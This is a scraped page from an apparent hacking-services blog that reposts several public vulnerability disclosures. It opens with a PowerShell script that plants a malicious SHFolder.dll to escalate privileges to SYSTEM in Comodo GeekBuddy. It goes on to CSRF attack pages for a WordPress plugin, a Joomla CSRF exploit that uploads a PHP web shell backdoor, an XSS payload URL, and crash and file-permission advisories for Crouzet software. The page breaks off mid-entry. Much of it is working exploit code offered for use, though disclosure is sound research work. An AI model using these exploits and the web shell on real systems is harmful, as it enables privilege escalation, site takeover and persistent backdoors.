<#
````......````
``,;''''''''''''''''';,`
.;''''''''''''''''''''''''''',`
`:''''''''+';:,.``````.,:;'''''''''':`
,;'''''';,.` ``,;'''''';:
`:'''''',. `,'''''';.
`;+''+':` ,; `,''''';.
`;'''';. `` .:;'` `. `;'''''.
` :+''';` `,``:+'' ';;'`,''; `` `` :'''';`
.'''';` ,';' '':'` ';,'`'',' :''' .''` :'''',
`;''''` ;'' :+.` ;';, ';:' ''''`,;:+ '', `;''''`
.''''. ;:`, .'.':`'''.:;`;. +;:' '::; ;''' '; .'''',
:''';` ` '''',`':'' ..;:`','` '''' ':;;`'`';`':` :; :''';
;''+, .;`.'.'' ';.'`';': ,:. ` ` ` `,: .';',,'`;'.`';': .+'''`
`''''` ;'; ''.'.,','` ,` ``;`'' .`;'`''+: ;'''`
`'''' ., .'' ,'.'' ;;. ```````` `. ``'::'`;; ` :'''.
``''': `+,` .':`'',' `,;''''''''''+'':.` ;'.+:;'``': .'''.
`''', '', ''`:; `:'''''''''''''''''''''';. `;'`': ''`'` .''',
`''', ` `''` `'; .''''''''''''''''''''''''''''';` `.;' ;'.''`.: `''',
`''', :''.`'' ` ,;'''''''''''''''''''''''''''''''';. ` `,.'::', ''` .'''.
''', '.''`,': ,'''''''''''''''''''''''''''''''''''''', ` .+,'; ''; .'''`
''': ''`'' ;. `'''''''''''''''''';:::;';'''''''''''''''''. ;' :': ,,` .'''
:''; `''.'` ` :''''''''''''';:::.', `''';`:;'+'''','''''+; `,'; :''' ,'''
.''' `` .++; `''''''''''''`. `': '''; `:''' :'''''''. .+ :''.+. :'':
`''+ :'': `` ,''''''''''''' `': '''; `: ,'''''''': .`''.'' ` '''`
;''. `+.',; ;'''':''''''''; ` ', .'''': ` :''''';'''; `'.',`,', `+''
,'': '';,'. ;''''':''''''''`+` ;..`;'+''. '.:''''';'''''```.+' +:'` .'';
`''' `;``+',;.` ;''''':''''''''.'; `;'', '` '' ;''''','''''` ;,+.+. ;''.
;'+. :'': ;': ;'''''':''''':',''. `'';.+' '` ,'; .'''';''''''` `+.':` `'''
`'': .+`;''` ` ;'''''':''''''.::''. .''. :: `'';`,'''':''''''` :+'. ,'',
'''` :''.:'' :''''''':'''''; :'''' .'', `.,; :+'`''': ;''',''''''' ,` '''
.'': `'';`` ,''''''':;''''':`''';', ,''+` ,+':' +'''''''`,'''''''''''; .+` .'':
''' `''. :', `''''''':`'''''+.;';.:::::::,,''';`'': . .'''''''; ''''.''''''', ` ;'': '''
.'', ','';`. '''''''; :'''''' `,;'''''''''.``` . ''''';:,`:;''+`'''',,'''''''` :'';` `+':
'''` ''.,'; ;''''''; ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :''''''' '''. ;''
`'': .'';:; `'''''''` .+'', ,''''''''''''; '''''''++`''''':..:'''' `''''' ;'''''', ., `` .'',
` :'' :''` ''''''+` ;''``;'''''''''''''':``,,.`````,'''''. ';.;'''` `'''''''` .++. '';
+'' ,'''''': ;+`,'''''''''''''''''+''';;;;'''''''+` :;+,`''. `.''''''; .+'''` :'+`
,''. ': +'''''; ,,;''''''''''''''''''''''''''''''''''. `.::,` `';.', ;''''''` :'': `. `'';
;'' :;.;': ,''''''. `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;, `''''''; `.; .;'+` ;''
'': ` ;';';' ''''''; ''';;''''''',`.'',` .:;;''''''''''.,'''''''''''.;;. ,'''''' `;''''. .''`
.''. .';`;' .''''''. :+;;''''''''''': ;' ::::...;''+'':,'''';..``;''';. ''''''; `:''.`': `'':
:'' ` ,'` ;''''''. :;'''''''''''''';`;, `,''';` .:;;;'''': ,'''''' .,''', '''
;'; ''';,` `''''''''''` :''''''''''';.:'''`';:` ,''';`;''''''''''', ''''''. ;';,` :''`
`'', .;,'''; ,'''''''''' ;'''''''''':` :'''`::` ``'''',+''''''''''''+` ;'''''; .``.:;` `''.
.''` `+;'`;` '''''''''';.'''''''',` ''';` :''';'''';::;'''''';; ` `''''''` ;'';;; `+':
:'' ..;'' `''''''''''`'''''''', .'''` `+''';''. ,'''''''''''''''''''''''''''''''''''''':`
;'' :. `` .'''''''''';'''''''' ;''; ;''':::` :'''''''''''''''''''''''''''''''''''''''',
;': '''':` :'''''''''''''''''',` .''' ''''. `+'''''''''''''''''''''''''''''''''''''''''
'', :,;'': ;''''''''''''''''''` ;''... :''''` :''''''''''''''''''''''''''''''''''''''''''`
`''. `+'':,` ''''''''''''''''''; ,'';.+` . ,;''' `'''''''''''''''''''''''''''''''''''''''''';
.''. `.,;'; '''''''''';''''''', ''',+. `` .' .''' ''''''''+'''''''''''''''''''''''''''''''''',
.'+` ;''''' `` '''''''` `;''''.'++','`+.''' ''''''; `;+''''''
,'' ''''';; ,'''';'''';'``.''' :''''''` .'''''':
:'+ '''''': .'''';'''';'` .''' ,''''''` ,''''';
:'' ,''''', ''''''` .'''';'''';', .'''` .''''''` ''''''
;'' `''''''; :''''', '''''' .'''';'''';':,''''. .''''''` ''''''
;'' `';''''' :''''', :''''; :''''''''';''.''''' `''''''` ;'''''
;'' :''''', ,''''' `+''''''''':''.'''''` ,'''''; ''''''
:'+ ,''''', `'''''. ,'''''''''':''::''''; ;''''': `''''''
:'' ```. ,''''': ''''': `''''''''''',''+`'''''. `''''''. :''''''
,''` `''''''' .'''''; `''''': '''''''''''';''',,''''', ''''''' ,'''''',
.''` `''':,.; `'''''' `'''''': '''''''''''''';'''`'''''':. `,''''''', .''''''''
`''` `,;;;''` '''''' `'','''';,` `,''''''''''''''',''':.''''''''''''''''''':` ;'''''''''''''''''''''''''''''',
'', `+';;, '''''' `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+ '''''''''''''''''''''''''''''';
'': ` `,. ;'''''. `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;; `''''''''''''''''''''''''''';';
;'; ,''''; :''''': `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,', ,'''''''''''''''''''''''''''';
;'' ';;,.. .'''''' `''';; :''''''''''''''''';'''''''. '''''`;'''''''''''';+'` ;'''''''''''''''''''''''''';.
:'' `,:;''' ''''''` `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+: '''''''';''''''''';''''';,`
.''. .''',` ;''''': ` ''':;''. ````` :+'''''',;''''''', '''''';..;''''''''''` `'''''' `,'': `+':
'': ` .;. ,'''''+ .'';,'''''''';:''''''''','''''''': ;'''''''''.`,''''''' ;'''''; ,'', .''.
''; :+.++` `''''''. +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''', ''''''. ':''', :''`
:'' ,';:.'. ;'''''' ''''.:''''''''''''''''';;'''''''''''.'''. `:;'''''':'': :'''''' ';,.:' '''
.''. .;:''' .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''', '''''': ,'''', `'':
''; ;';, ;` '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';' ,. .;: ,''`
;'' `;', `,'''''''''''''.,'''''''''''''';','''';:.`` `,.;'''''''''''.+''''''.''''''; ,'+'. '''
.''. '''';` ''''';''''''';`'''''''''''''':.'';:,;'''':` ,:`:''''''''','',`:''':''''''` '.:''' `'':
''' :'': `:. ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.''''''; `'''..' :''
:''` `,. ;:++` ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+'''''' ;. ,+''` '';
`'': `'',`;: `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,' ,'',
;''` `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;'''''''' +.''+; '''
`'': ;'';` ` ''''''':''''';`'''''''', '''''''''''''''.,''''`''''',:''''`,'''''''` '''.:'; .'':
''+` ,` ,+: `'''''','''''':`'''''''` :'''''''''''''; ;'''`+''''`;'''':+''''''.` ` :'':;, '''
.'': ;';''. .'''''';'''''',`'''''+ ''''''''''''''` .,'';.''''' '''''''''''': +'``;'; .'',
''+` :''; ,'` :''''','''''''.,''''' ,'''''''''''''' :''''';''''','''';''''''; ,.''. .`` '''
`';; `+. ;'':' :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.'''''' :';`''; :''.
:'',` `'':.''` ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;'''''' ` :''.'''` `'''
''' ;'.:''` ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''` .''``'+',: '''`
.';; `;;'; ` :''''':'''''';'''`'';''''''''''': ,''''''''''`''';'''''; .,''` :` ,'':
;'', `', `'. ,''''';''''';'''''':''''''''''': .''''''''',`+';,''''; ``.'''; ``'''
'''` `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'', ,'`:'''''` '''`
.''' ;'.'' `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',` `;''''''';. ;'',
,''; ''.;', ,';''''';,''''''`+,` .;:;''',,'';'''+.;''''',```:+,''''''''''.:'';
;''; ''';', '. `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''
''': .,,': :': +''''''',''';.:'+,.` `.:''':`''''''''''; `'':'''''''''''''',`
''': ` .'' `'`;'''''''..,.:+,` ``.,.` ,'''`;'''''''+.';'.:'''':;'''''+:.'`
''': ;:`+'` ,:..,''''''; .+: `:'+''''';` ;'; .''''': `:';:+''';`''''''. .':
`'''; ; ;'. .';'`;'''',;'. .+''''''''''` ;;'+:'''; .+'''''''';''''''.;,'';
`'''' ,'; :'`'`;'''':+` `'''''''''''': ;'';'''`;''''''''''''''''',.''';
`'''' ` ` `':. ';''.+. `''''''''''''; `'''''::'''.'''',`'''''': :';;''
''''. :;,'`:'.';', '''''''''''': ,'''','''..''': '''';;:,''. `''
:''': `.+'' '''',' :''''''''''+. ''''''':`'''' .''';:;`.'.:' ';
,''''` `,` ',;:'. `;;;,``'''::::;''; :';, ,'''''' ;'''` +'''.''+'.:'+`':
`'''': ` ;'':' '''''+;.; `` ,:`''''', `'''''`,'''' :'''.''''..''','.
:''''. .,': :'''''''.`;'''';` .''''''` '''':`+'''``''',;'''``''';:'.
`'''''` `.'` ''''''';`'''''''': ,'''''; ;'''`''''; ''';:'''. ;''',''
,'''''` `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.:
:''''', .' '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '.
`:+'''';..; '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+
`,''''':' ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:
.;+':' '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' +
.:+` '''''''`''''''+'''+.'''''; .' ;''' ;''.;,'' ' ''.:``:
'. :'''''':.+'''''''',;''''', ;: ;''; '''.'.,;,,:'' '`'
;; `'''''''``;'''''',`,''''' `'` ''',.''',.:;`' ''.,.`;
.+ ''''''' ` `.,,.`'; '''; :; `''+`;'';;: :.;`',`; ;`
+: `'''''``';;;;;'''', `` `+. `''' '''::;;:;`;'`;..,
,' ``.. `+''''''''''+` :' `'';`''':. ,.',''.; '
`+' :'''''''''''', `+.` '',.''',. :,''''+ ;
.', ;''''''''''''. ': ''.,''':` ;.''''.,.
:'. :''''''''''', ;'` ''.:''',':;.''':.:
''. ,:''''',` ;+` :'.:'''' ':`''; ;
`'', ''. ::,''''``; :, '
;+;` .'+` ``'':'`,; '``
,'';. `.'';` :';'.,; '.
`,''';:::::;'''. ``+;' +`
`,:''''';,` ,,;
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
###Technical Geeky Stuff###
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
The directory listing is as follows:
10/06/2015 12:08 AM <DIR> .
10/06/2015 12:08 AM <DIR> ..
10/02/2015 10:43 PM 27 download.cfg
10/02/2015 10:47 PM 637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015 10:44 PM 2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015 10:44 PM 547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015 12:07 AM 1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015 10:44 PM 554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015 12:06 AM 950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015 12:08 AM 563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015 10:43 PM 768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015 12:08 AM 581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015 10:47 PM 459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015 10:46 PM 1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015 12:07 AM 1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015 12:07 AM 648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015 10:43 PM 1 survey_version.txt
10/06/2015 12:05 AM <DIR> updates
The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access. This allows
non-administrator users the ability to create files in the directory but not delete or modify
existing files.
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
in the C:\Program Files (x86)\Common Files\COMODO\ folder. This service is auto launched by the
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM
level privielges. This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe
to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.
During client connections to update servers and Geek Buddy executions the unit.exe binary will
launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe. This setup binary has
hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is
executed from.
.data:00409240 dd offset aShfolder ; "SHFOLDER"
.data:00409244 dd offset aShgetfolderpat ; "SHGetFolderPathA"
During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before
looking in the other PATHS variables.
By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an
update or client connection to secure servers (which occurs automatically at user login) a user can
elevate their privileges to SYSTEM and compromise the system fully.
######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times. C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do. #Ninja
Sizzop - for fixing my greetz
#########################################################################################################
#>
Param
(
[Parameter(ValueFromPipelineByPropertyName = $true)]
[string]$DLL = ""
)
if (!(Test-Path $DLL))
{
throw "Fatal Error: The specified file: $DLL does not exist."
}
Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info"
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
$objNotifyIcon.Visible = $True
$objNotifyIcon.ShowBalloonTip(8000)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863286199
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Wordpress More Fields Plugin 2.1 Cross-Site Request Forgery
# Date: 28-02-2016
# Software Link: https://wordpress.org/support/plugin/more-fields
# Exploit Author: Aatif Shahdad
# Twitter: https://twitter.com/61617469665f736
# Contact: aatif_shahdad@icloud.com
# Category: webapps
1. Description
The plugin More Fields has CSRF token validation disabled for all functions, including the add box and delete box options. As a result, a specially crafted attacker page could cause
a logged-in administrator to add and delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
2. Proof of Concept
Login as admin to the wp-admin area at http://example.com/wp-admin. Open the following Proof-Of-Concept with the browser that you used to log in.
POC to add box named ‘test’:
--POC begins--
Add Boxes:
<html>
<body>
<form action="https://example.com/wpadmin/optionsgeneral.php?page=more-
fields&action=save&keys=_plugin%2C57UPhPh&navigation=boxes" method="POST">
<input type="hidden" name="label" value="test" />
<input type="hidden" name="post_types[]" value="press" />
<input type="hidden" name="position" value="left" />
<input type="hidden" name="fields" value="" />
<input type="hidden" name="ancestor_key" value="" />
<input type="hidden" name="originating_keys" value="_plugin,57UPhPh" />
<input type="hidden" name="action" value="save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Remove Boxes needs the following simple GET request (Assuming the name of the Box we want to delete is ‘test’):
<html>
<body>
<form action="https://example.com/wpadmin/optionsgeneral.php">
<input type="hidden" name="page" value="more-fields" />
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="action_keys" value="_plugin,test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Note: I have removed the CSRF tokens from the requests as they are redundant and not validated.
--End of POC--
3. Impact
The attacker can add/delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
4. Solution:
Add in CSRF token validation to the plugin or switch to a different plugin. The development of the Plugin has ceased so this happens to be the latest version which can’t be upgraded as of now.
---------------------------------------------------------
RatioSec Research Security Advisory RS-2016-001
---------------------------------------------------------
JSN PowerAdmin Joomla! Extension Remote Command Execution Via CSRF and
XSS vulnerabilities
---------------------------------------------------------
Product: JSN PowerAdmin Joomla! Extension
Vendor: JoomlaShine.com
Tested Versions: 2.3.0
Other Vulnerable Versions: Prior versions may also be affected
Vendor Notification: 28th January, 2016
Advisory Publication: 24th February, 2016
CVE Reference: Pending
RatioSec Advisory Reference: RS-2016-001
Risk Level: High
CVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
---------------------------------------------------------
RatioSec Research has discovered two cross-site request forgery and
reflected cross-site scripting vulnerabilities in JSN PowerAdmin
Joomla! Extension which can be exploited, respectively, to upload PHP
files and run arbitrary HTML and script code in a user's browser
session in context of the affected web site.
1) The application allows users to perform certain actions via HTTP
requests without performing proper checks to verify the requests
validity. An authenticated user's browser can be forced to upload PHP
files via the extension installer and subsequently execute arbitrary
commands with the web server privileges by tricking the user into
visiting a malicious web site.
2) Input passed to `identified_name` GET parameter when `package` is
set, `option` is set to `com_poweradmin`, `view` is set to
`installer`, and `task` is set to `installer.install` in
`/administrator/index.php` is not properly sanitised before being
reflected. This can be exploited to run arbitrary HTML and script code
in a user's browser session in context of the affected web site.
---------------------------------------------------------
Proof of Concept
Read the advisory details on the RatioSec Research website for the
proof of concept code.
http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/
----------------------------------------------------------
Solution
No official solution is currently available.
----------------------------------------------------------
Timeline
- First contact: 27th January, 2016
- Disclosure: 28th January, 2016. Preliminary date set to 10th, February 2016.
- E-mail notice after no response: 02nd February, 2016
- Advisory Publication: 24th February, 2016
----------------------------------------------------------
Advisory URL
http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/
RatioSec Research
Mail: research at ratiosec dot com
Web: http://www.ratiosec.com/
Twitter: https://twitter.com/ratio_sec
----------------
Proof Of Concept
1) The following HTML page exploits the cross-site request forgery vulnerability and uploads a malicious PHP script system($_GET['cmd']); as /tmp/bd.phtml if visited by a logged-in administrator.
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/no8/joomla/administrator/index.php?option=com_poweradmin&view=installer&task=installer.install", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------167969427914885435381146171168");
xhr.withCredentials = true;
var body = "-----------------------------167969427914885435381146171168\r\n" +
"Content-Disposition: form-data; name=\"package\"; filename=\"bd.phtml\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3cscript language=\"php\"\x3esystem($_GET['cmd']);\r\n" +
"\r\n" +
"-----------------------------167969427914885435381146171168--\r\n" +
"\r\n" +
"\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
The file extension .phtml and the <script language="php"> </script> tags are used here to fool the Joomla API JFile::upload() file validation checks. As result, the backdoor is installed permanently as /tmp/bd.phtml which can be used lately by the attacker to obtain the full system compromise.
Command Execution
2) The following URL exploits the cross-site scripting vulnerability to execute javascript code in a logged-in administrator’s browser.
http://localhost/joomla/administrator/index.php?package=foobar&option=com_poweradmin&view=installer&task=installer.install&identified_name=<img+src%3dx+onerror=alert("RatioSecResearch")>
Crouzet em4 soft 1.1.04 Integer Division By Zero
Vendor: Crouzet Automatismes SAS
Product web page: http://www.crouzet-automation.com
Affected version: 1.1.04 and 1.1.03.01
Summary: em4 is more than just a nano-PLC. It is a leading
edge device supported by best-in-class tools that enables
you to create and implement the smartest automation applications.
Desc: em4 soft suffers from a division by zero attack when handling
Crouzet Logic Software Document '.pm4' files, resulting in denial
of service vulnerability and possibly loss of data.
---------------------------------------------------------------------
(187c.1534): Integer divide-by-zero - code c0000094 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image013b0000
*** ERROR: Module load completed but symbols could not be loaded for image013b0000
eax=00000000 ebx=00000000 ecx=55c37c10 edx=00000000 esi=0105b13c edi=0110bb18
eip=013ea575 esp=0064d8b8 ebp=0064d8f4 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
image013b0000+0x3a575:
013ea575 f7bf18010000 idiv eax,dword ptr [edi+118h] ds:002b:0110bc30=00000000
0:000> u
image013b0000+0x3a575:
013ea575 f7bf18010000 idiv eax,dword ptr [edi+118h]
013ea57b 8d4de0 lea ecx,[ebp-20h]
013ea57e c745fc00000000 mov dword ptr [ebp-4],0
013ea585 50 push eax
013ea586 6808505b01 push offset image013b0000+0x205008 (015b5008)
013ea58b 51 push ecx
013ea58c ff15b0575a01 call dword ptr [image013b0000+0x1f57b0 (015a57b0)]
013ea592 8b870c010000 mov eax,dword ptr [edi+10Ch]
---------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5309
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5309.php
25.01.2016
--
PoC:
http://zeroscience.mk/codes/poc5309.pm4.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39509.zip
Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 Insecure File Permissions
Vendor: Crouzet Automatismes SAS
Product web page: http://www.crouzet-automation.com
Affected version: em4 soft (1.1.04 and 1.1.03.01)
M3 soft (3.1.2.0)
Summary: em4 is more than just a nano-PLC. It is a leading
edge device supported by best-in-class tools that enables
you to create and implement the smartest automation applications.
Millenium 3 (M3) is easy to program and to implement, it enables
the control and monitoring of machines and automation installations
with up to 50 I/O. It is positioned right at the heart of the
Crouzet Automation range.
Desc: em4 soft and M3 soft suffers from an elevation of privileges
vulnerability which can be used by a simple authenticated user that can
change the executable file with a binary of choice. The vulnerability
exist due to the improper permissions, with the 'C' flag (Change) for
'Everyone' group.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5310
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5310.php
25.01.2016
--
C:\Program Files (x86)\Crouzet automation>cacls "em4 soft"
C:\Program Files (x86)\Crouzet automation\em4 soft Everyone:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\Crouzet automation>cd "em4 soft"
C:\Program Files (x86)\Crouzet automation\em4 soft>cacls *.exe
C:\Program Files (x86)\Crouzet automation\em4 soft\em4 soft.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet automation\em4 soft\unins000.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet automation\em4 soft>
================================================================================================
C:\Program Files (x86)\Crouzet Automatismes>cacls "Millenium 3"
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3 Everyone:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\Crouzet Automatismes>cd "Millenium 3"
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3>cacls *.exe
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3\M3 soft.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3\unins000.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3>
# Exploit Title: Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs
# Date: 01-03-2016
# Exploit Author: Shantanu Khandelwal Twitter: @shantanu561993 <shantanu561993@gmail.com>
# Vendor Homepage: http://www.viscomsoft.com/
# Software Link: http://www.viscomsoft.com/downloads/calendar.html
# Version: 2.0
# Tested on: Windows XP IE-8 , Windows 7 IE-8
Multiple Vulnerabilities found in calender.ocx file
Multiple Access violations
POC:
https://www.dropbox.com/s/rtakkmw9ru55lbn/CALENDARLib.zip?dl=0
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39512.zip
# Exploit Title: WordPress CP Polls 1.0.8 - CSRF - Update poll settings & Persistent XSS
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
=============
Description
=============
With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results.
You can receive email notifications every time a vote is added or opt to receive Excel reports periodically.
